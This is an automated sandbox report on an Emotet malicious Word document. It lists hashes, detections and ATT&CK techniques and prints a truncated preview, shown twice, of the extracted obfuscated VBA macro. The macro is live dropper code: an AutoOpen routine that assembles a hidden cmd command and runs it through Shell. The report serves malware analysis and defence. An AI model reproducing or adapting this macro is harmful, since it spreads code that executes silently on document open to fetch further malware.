Emotet Office (OLE) malware analysis — malicious · 5a8be61da7e3419d

MALICIOUS

Office (OLE)

176.9 KB Created: 2018-07-25 14:29:00 Authoring application: Microsoft Office Word First seen: 2018-07-27

MD5: 79b75d2104e3e0cffd15050034175570 SHA-1: 18b0f35a7e0692b2d4b78229911d1a97f9a795f2 SHA-256: 5a8be61da7e3419d3e08be8f8e04b626ba4d3f5577bfebbecb987dc33268fefe

142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6802950-0'. The presence of an AutoOpen VBA macro indicates an attempt to automatically execute malicious code upon opening the document. The VBA script, although obfuscated, likely attempts to download and execute a second-stage payload, a common characteristic of Emotet droppers.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6802950-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6802950-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36138 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	36138 bytes
SHA-256: `42f9a67e0e0b4589107a8d64283fd44155d09c641880ecea255d594515f30ffa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "amFAQmi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next RRDjV = supwE zdIfhH = 560 ELCdwh = CDbl(7939) imWiSZUu = "" + jvRYMaoDi + UAkEUfiQVMIiq + CVar("cm") + jTOPkwGDhHS + SFmPslP + bUQuDDOS + RjkcPT + EknRr + YiIbKFwva + AGKuBJC + fqwiqi + fPjGcv + JTWRbmMu + LAvwOopqIQ + iIJMfXwwTa + IiFHUTcDob + dwjJGmo + XjMHGtaQ + AnPXP + czaNXkWuokO + TdnFSFjnwt + fEwfkwjzE + uMScbLVJHS + nioRpLuuw + oUzuI + ZAwJRHd + QRozVm + PFizuVCUbA + XRCzhsm + YAwGf + ZwTKMQ + rwmAUNL + PdkGHTjdCrU + XfOfPVuS + iYhhlsbi + MjrdpLttWTz + zRzuQ + iuwmpik + iMmHOwG + nwaUTIpnsB + spHJJ + vKFhwiC + tqNPAMuzBrr + EMhvZcA + NFpRsij + lDiqIdSjU + jiHKqINjAz + HrlwItq + svJrLupG + sfaRhOQGqHL + wPiSNiMcI + bmjtUoTct + CzBibwPatmFWfo NGzZC = qqKSY vQrBAq = Int(98) Shell@ imWiSZUu, 0 BARbh = ChrW(WQEFEk) End Sub Attribute VB_Name = "uouvHKXJZi" Function bUQuDDOS() On Error Resume Next XtujJC = zCsTWa XzqnCr = 3 rirYlTAo = "d" + " " KJrUQa = FAYNS VapUcn = " " + " /" + "c " + " " + "FO" zGXYzS = "R /" + "F " + CStr(Chr(SUlXQMDh + jvpZWkmTYzivj + 34 + rDVmqSiEwa + ShTShfdcHzt)) + "token" + "s=2" + " delims=" + "P=Mf" + CStr(Chr(ZwjVcWosD + huwZzrsw + 34 + TmFfzPCP + JiTRVziTEGjPH)) + " %d I" + "N (" wHqpMXoK = "'assoc.cmd" + "')" + "DO " + "%d /V:" + " /r" ptuTIuU = " " + CStr(Chr(mjEiPGuPLFJd + HldqjADafDw + 34 + uVYDfvuKjw + lOPILMVsowUGYa)) + " s" + "et " + " +" + "$=" oAbwZz = Sin(20930 * jcYOW + 3199 / QUEBkB) otXCC = VCdfY CBGLdC = Fix(HpMvYr) iFZVbkLSYT = "//-/-\_/\" + "_-\__\ -/_" poaEn = EBwINL EUorfa = FnQFFv iAVjORf = "-\-/\_-\" + "_\// " + "/_-//\" + "/-\\__-_" + "\ /\-_\" + "-" zRWZQk = Atn(841) UUELD = "_/\\_/_/- " + "/--\" + "/\_" Mthnqz = CSng(ZEzSsj) KdjGG = 2650 QLlTBRTkmdr = "/-\_\_/_" + " _\_--/\\" + "/-//\__ \" bUQuDDOS = rirYlTAo + VapUcn + zGXYzS + wHqpMXoK + ptuTIuU + iFZVbkLSYT + iAVjORf + UUELD + QLlTBRTkmdr jcvEu = DwuzM KDTnj = ChrB(878) End Function Function RjkcPT() On Error Resume Next HszmwV = 46 EUZEEAXZHBT = "___/\//\_" + "-\--/ --_/" utlOA = YtWRw JCvUY = Log(nJNpi) iKzDMifCavj = "\/-_\" + "_\/" + "_\- \_-\\_" wkdqsTHR = "\/-" + "_-/-/_ _" + "-\_\-" + "_//_\/" + "/\- _/-_-" + "/\\_-" TMMVpq = "\/\_- \_-_" + "\-/\_\" + "//--/ _" + "_" + "__\-/" + "/" + "\\/\--" GpzLju = Round(wGAhUO) mlwCVr = Haonf TBmBu = HmBwq zEUjCbRBti = "- \/\--_" + "_/-_/\/-" + "_ -_" + "-/\-" + "/_/-\\__\" + " _\_-" + "-\/_//" mYVGRD = Rnd(GNWHM) vdXYcdE = "-\-_/" + " /" + "\\-" WvOrp = 5989 jfZjz = AnJDm CrsRShk = "/\\_/--/-" + "__ --/-" + "\" + "-_\" + "__/" + "/_\\}" uirQuoRCF = "\_-_///-__" HGYJa = Log(kLCfUw) IQXzn = 98 zIbYP = lfNiHG wDQjzROS = "-\/\-}-\/" + "/_-_/\-/" + "\\-_{\/_//" + "_-\_\" RjkcPT = EUZEEAXZHBT + iKzDMifCavj + wkdqsTHR + TMMVpq + zEUjCbRBti + vdXYcdE + CrsRShk + uirQuoRCF + wDQjzROS zHjlP = CLng(813) End Function Function EknRr() On Error Resume Next JaijVRl = "-" + "-\_/h" ibDNo = 5060 MCjpBbvpAi = "/\_-" obZoFw = 141 UdptDwCiHD = "-\-//" + "_-_\/_c/--" + "/__-/\\\-_" + "/\t/_/-" + "_-" OiAsvW = 307123685 TXzHJT = ChrB(ckJQZo) tMhwzqnZGB = "\" + "_\/_\--/a/" + "_-\\/_" + "--\/" + "-\/_c\-" + "/" qwUIPkqkNG = "\_" + "_-///" + "__\\-}" + "_" EknRr = JaijVRl + MCjpBbvpAi + UdptDwCiHD + tMhwzqnZGB + qwUIPkqkNG VIclD = CGzEwZ rJLVrR = CDbl(DTrvj) End Function Function YiIbKFwva() On Error Resume Next UXpYA = CByte(AHEkT) CktfQ = "_" + "/\_\-_\/" + "\--//" + ";\" + "\--_/" XAkqp = CdDJOR zbsPN = ChrB(59579 * TlaAuk - GZSqE / wUFLwA) wRHFJwn = "/-_-_\/" + "/_k/-\_-\" RMJivk = 2 EkHdV = CSng(16838 / nRwipo + 86246 * fAsiH) PXGfpA = RdDUIc fFBaP = "___/--//" AaOBv = 7 ZIWsBH = 19 BCcVYIN = "\a-" + "_--///\" + "-\" + "\/__\e\" + "-\" sYsiiC = iWisi JBQDL = CBool ... (truncated)

SHA-256: 42f9a67e0e0b4589107a8d64283fd44155d09c641880ecea255d594515f30ffa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "amFAQmi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   RRDjV = supwE
   zdIfhH = 560
   ELCdwh = CDbl(7939)
imWiSZUu = "" + jvRYMaoDi + UAkEUfiQVMIiq + CVar("cm") + jTOPkwGDhHS + SFmPslP + bUQuDDOS + RjkcPT + EknRr + YiIbKFwva + AGKuBJC + fqwiqi + fPjGcv + JTWRbmMu + LAvwOopqIQ + iIJMfXwwTa + IiFHUTcDob + dwjJGmo + XjMHGtaQ + AnPXP + czaNXkWuokO + TdnFSFjnwt + fEwfkwjzE + uMScbLVJHS + nioRpLuuw + oUzuI + ZAwJRHd + QRozVm + PFizuVCUbA + XRCzhsm + YAwGf + ZwTKMQ + rwmAUNL + PdkGHTjdCrU + XfOfPVuS + iYhhlsbi + MjrdpLttWTz + zRzuQ + iuwmpik + iMmHOwG + nwaUTIpnsB + spHJJ + vKFhwiC + tqNPAMuzBrr + EMhvZcA + NFpRsij + lDiqIdSjU + jiHKqINjAz + HrlwItq + svJrLupG + sfaRhOQGqHL + wPiSNiMcI + bmjtUoTct + CzBibwPatmFWfo
   NGzZC = qqKSY
   vQrBAq = Int(98)
Shell@ imWiSZUu, 0
   BARbh = ChrW(WQEFEk)
End Sub


Attribute VB_Name = "uouvHKXJZi"
Function bUQuDDOS()
On Error Resume Next
XtujJC = zCsTWa
   XzqnCr = 3
rirYlTAo = "d" + "          "
KJrUQa = FAYNS
VapUcn = "   " + "  /" + "c      " + "         " + "FO"
zGXYzS = "R /" + "F " + CStr(Chr(SUlXQMDh + jvpZWkmTYzivj + 34 + rDVmqSiEwa + ShTShfdcHzt)) + "token" + "s=2" + " delims=" + "P=Mf" + CStr(Chr(ZwjVcWosD + huwZzrsw + 34 + TmFfzPCP + JiTRVziTEGjPH)) + " %d I" + "N ("
wHqpMXoK = "'assoc.cmd" + "')" + "DO " + "%d   /V:" + "      /r"
ptuTIuU = " " + CStr(Chr(mjEiPGuPLFJd + HldqjADafDw + 34 + uVYDfvuKjw + lOPILMVsowUGYa)) + "  s" + "et   " + "  +" + "$="
oAbwZz = Sin(20930 * jcYOW + 3199 / QUEBkB)
   otXCC = VCdfY
   CBGLdC = Fix(HpMvYr)
iFZVbkLSYT = "//-/-\_/\" + "_-\__\ -/_"
poaEn = EBwINL
   EUorfa = FnQFFv
iAVjORf = "-\-/\_-\" + "_\// " + "/_-//\" + "/-\\__-_" + "\ /\-_\" + "-"
zRWZQk = Atn(841)
UUELD = "_/\\_/_/- " + "/--\" + "/\_"
Mthnqz = CSng(ZEzSsj)
   KdjGG = 2650
QLlTBRTkmdr = "/-\_\_/_" + " _\_--/\\" + "/-//\__ \"
bUQuDDOS = rirYlTAo + VapUcn + zGXYzS + wHqpMXoK + ptuTIuU + iFZVbkLSYT + iAVjORf + UUELD + QLlTBRTkmdr
   jcvEu = DwuzM
   KDTnj = ChrB(878)
End Function
Function RjkcPT()
On Error Resume Next
HszmwV = 46
EUZEEAXZHBT = "___/\//\_" + "-\--/ --_/"
utlOA = YtWRw
   JCvUY = Log(nJNpi)
iKzDMifCavj = "\/-_\" + "_\/" + "_\- \_-\\_"
wkdqsTHR = "\/-" + "_-/-/_ _" + "-\_\-" + "_//_\/" + "/\- _/-_-" + "/\\_-"
TMMVpq = "\/\_- \_-_" + "\-/\_\" + "//--/ _" + "_" + "__\-/" + "/" + "\\/\--"
GpzLju = Round(wGAhUO)
   mlwCVr = Haonf
   TBmBu = HmBwq
zEUjCbRBti = "- \/\--_" + "_/-_/\/-" + "_ -_" + "-/\-" + "/_/-\\__\" + " _\_-" + "-\/_//"
mYVGRD = Rnd(GNWHM)
vdXYcdE = "-\-_/" + " /" + "\\-"
WvOrp = 5989
   jfZjz = AnJDm
CrsRShk = "/\\_/--/-" + "__ --/-" + "\" + "-_\" + "__/" + "/_\\}"
uirQuoRCF = "\_-_///-__"
HGYJa = Log(kLCfUw)
   IQXzn = 98
   zIbYP = lfNiHG
wDQjzROS = "-\/\-}-\/" + "/_-_/\-/" + "\\-_{\/_//" + "_-\_\"
RjkcPT = EUZEEAXZHBT + iKzDMifCavj + wkdqsTHR + TMMVpq + zEUjCbRBti + vdXYcdE + CrsRShk + uirQuoRCF + wDQjzROS
   zHjlP = CLng(813)
End Function
Function EknRr()
On Error Resume Next
JaijVRl = "-" + "-\_/h"
ibDNo = 5060
MCjpBbvpAi = "/\_-"
obZoFw = 141
UdptDwCiHD = "-\-//" + "_-_\/_c/--" + "/__-/\\\-_" + "/\t/_/-" + "_-"
OiAsvW = 307123685
   TXzHJT = ChrB(ckJQZo)
tMhwzqnZGB = "\" + "_\/_\--/a/" + "_-\\/_" + "--\/" + "-\/_c\-" + "/"
qwUIPkqkNG = "\_" + "_-///" + "__\\-}" + "_"
EknRr = JaijVRl + MCjpBbvpAi + UdptDwCiHD + tMhwzqnZGB + qwUIPkqkNG
   VIclD = CGzEwZ
   rJLVrR = CDbl(DTrvj)
End Function
Function YiIbKFwva()
On Error Resume Next
UXpYA = CByte(AHEkT)
CktfQ = "_" + "/\_\-_\/" + "\--//" + ";\" + "\--_/"
XAkqp = CdDJOR
   zbsPN = ChrB(59579 * TlaAuk - GZSqE / wUFLwA)
wRHFJwn = "/-_-_\/" + "/_k/-\_-\"
RMJivk = 2
   EkHdV = CSng(16838 / nRwipo + 86246 * fAsiH)
   PXGfpA = RdDUIc
fFBaP = "___/--//"
AaOBv = 7
   ZIWsBH = 19
BCcVYIN = "\a-" + "_--///\" + "-\" + "\/__\e\" + "-\"
sYsiiC = iWisi
   JBQDL = CBool
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.